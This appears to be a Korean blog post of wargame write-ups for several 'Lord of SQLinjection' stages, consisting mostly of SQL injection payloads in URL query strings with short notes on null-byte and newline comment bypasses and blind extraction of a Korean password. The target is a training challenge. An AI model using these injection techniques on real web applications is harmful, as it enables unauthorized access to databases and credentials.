http://leaveret.kr/los/gate.php
zombie_assassin
?id=%00%27%20union%20select%201%23
succubus
?id=\&pw=%20union%20select%201%23
nightmare
?pw=%27>2);%00
xavis
크리스마스 ctf에서 나왔던것처럼 블라인드 한글 인젝션이다. 한글은 유니코드라서 2바이트로 취급하면 안된다. 답은
'우왕굳' 인데 pw='우왕굳' 이라 하면 substr(pw,1,1)처럼 뽑아내면 '우'가 뽑힌다. 2바이트로 취급하려다가 삽질함.
뽑아내려면 쿼리를 참으로 만든후 substr(pw,1,1)>'가' 이런식으로 ><문자를 잘 써서 찾아내면 된다.
dragon
상당히 재미있다. #뒤에 $_get이 있어 내가 뭘 입력하더라도 주석처리된다. 이걸 벗어나려면..?
개행을 이용하면 된다.
?pw=%0aunion%20select%20%27admin%27%20limit%201,1%23
'webhacking > sql, sql injection' 카테고리의 다른 글
| 새롭게 찾아낸 유용한 함수. (0) | 2015.02.08 |
|---|---|
| Lord Of SQLinjection iron_golem~evil_wizard (0) | 2015.02.03 |
| Lord Of SQLinjection gremlin~assassin (0) | 2015.02.02 |
| DareYourMind SQL Exploit 1~4 (0) | 2015.01.24 |
| webhacking.kr 27, 29 (0) | 2015.01.15 |